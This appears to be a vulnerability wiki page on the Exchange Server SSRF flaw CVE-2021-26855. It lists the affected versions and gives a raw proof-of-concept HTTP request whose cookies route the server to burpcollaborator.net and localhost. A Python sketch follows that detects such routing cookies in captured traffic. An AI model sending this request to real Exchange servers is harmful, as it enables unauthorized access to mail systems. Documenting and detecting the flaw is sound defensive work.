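# CVE-2021-26855 – Exchange Server SSRF Vulnerability
==Vulnerability Overview==
A server-side request forgery (SSRF) vulnerability in Exchange. An attacker who exploits this vulnerability can send arbitrary HTTP requests and authenticate through Exchange Server.
==Affected Versions==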
Microsoft Exchange Server: 2010
Microsoft Exchange Server: 2013
Microsoft Exchange Server: 2016
Microsoft Exchange Server: 2019
==SSRF==
<pre>
GET /owa/auth/x.js HTTP/1.1
Host: 0.0.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
</pre>
[[檔案:Ssrf.jpg]]
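A detection-side sketch for the request above, added here as an example and not part of the original page: it parses a raw HTTP request and reports the <code>X-BEResource</code> and <code>X-AnonResource-Backend</code> cookies when their value names a backend host and path. The function names and the value pattern (<code>host/path~digits</code>) are assumptions derived only from the request shown on this page.

```python
import re

# Cookie names taken from the request shown on this page.
ROUTING_COOKIES = ("x-beresource", "x-anonresource-backend")
# Value shape seen on this page (assumed pattern): <host>/<path>~<digits>
TARGET_RE = re.compile(r"^(?P<host>[^/\s;]+)/(?P<path>[^~]*)~(?P<ver>\d+)$")


def parse_request(raw):
    """Return (request line, {cookie name: value}) from a raw HTTP request."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [line for line in head.split("\n") if line.strip()]
    cookies = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() != "cookie":
            continue
        for part in value.split(";"):
            key, sep, val = part.strip().partition("=")
            if sep:
                cookies[key.lower()] = val
    return lines[0], cookies


def find_backend_overrides(raw):
    """Report routing cookies whose value names a backend host and path."""
    request_line, cookies = parse_request(raw)
    findings = []
    for name, value in cookies.items():
        match = TARGET_RE.match(value) if name in ROUTING_COOKIES else None
        if match:
            findings.append({"request": request_line, "cookie": name,
                             "host": match.group("host"),
                             "path": "/" + match.group("path")})
    return findings


# Constructed sample: the request from this page, one header per line.
SAMPLE = (
    "GET /owa/auth/x.js HTTP/1.1\r\nHost: 0.0.0.0\r\n"
    "Cookie: X-AnonResource=true; "
    "X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; "
    "X-BEResource=localhost/owa/auth/logon.aspx?~3;\r\n"
    "Accept-Language: en\r\nConnection: close\r\n\r\n"
)

if __name__ == "__main__":
    for finding in find_backend_overrides(SAMPLE):
        print(finding)
```

The input is a raw request as captured at a proxy or WAF; a request that carries only <code>X-AnonResource=true</code> produces no finding.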